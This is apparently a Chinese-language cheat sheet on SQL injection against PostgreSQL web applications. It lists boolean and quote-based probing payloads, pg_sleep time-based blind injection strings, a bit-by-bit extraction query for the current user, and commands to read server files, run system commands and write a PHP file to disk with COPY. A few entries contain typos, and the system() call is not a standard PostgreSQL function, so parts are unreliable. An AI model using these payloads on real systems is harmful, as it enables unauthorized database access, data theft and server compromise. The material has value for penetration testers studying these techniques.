關於PostgreSQL的SQL注入必知必會

1、postgresql簡介

postgresql是一款關係型數據庫，普遍應用在web編程當中，因爲其語法與MySQL不盡相同，因此其SQL注入又自成一派。

2、postgresql的SQL注入：（注意註釋符號--+）

一、簡單的有回顯的SQL注入不用多說，仍是基本的SQL語句直接查詢就能夠了。

1 #簡單的payload
2 parameter = 2-1
3 parameter = 1 and 1 = 2
4 parameter = 1 or 1 = 2-1
5 parameter = 1' and '1'='1#and -> or
6 parameter = 1' and '1'='2#and -> or

或者引號區分發（適用於字符串）

1 parameter = 1    #Success
2 parameter = 1'   #Failed
3 parameter = 1''  #Success

二、通常的基於時間的盲注，能夠參考下面的辦法：

1 #postgresql 的幾個簡單判斷payload：
2 parameter=1;select pg_sleep(5)
3 parameter=1';select pg_sleep(5)
4 parameter=1');select pg_sleep(5)
5 parameter=1);select pg_sleep(5)
6 parameter=1));select pg_sleep(5)
7 parameter=select pg_sleep(5)

盲注的逐位猜解

1 SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({current_user}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+

三、常見的函數查看一些基本信息：

1 SELECT version() #查看版本信息
2 #查看用戶
3 SELECT user;
4 SELECT current_user;
5 SELECT session_user;
6 SELECT usename FROM pg_user;#這裏是usename不是username
7 SELECT getpgusername();
8 #查看當前數據庫
9 SELECT current_database()

四、postgresql下的if

1 #mysql的
2 if(expr1,result1,result2);
3 #若是expr1知足，result1，不然result2
4 
5 #對於postgresql
6 select case when(expr1) then result1 else result2 end;
7 
8 #舉個例子
9 select casr when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;

五、其餘

（1）讀取文件：

1 select pg_read_file(filepath+filename);

（2）執行命令:

1 select system("comamnd_string");

（3）寫入文件：

1 COPY (select '<?php phpinfo();?>') to '/tmp/1.php';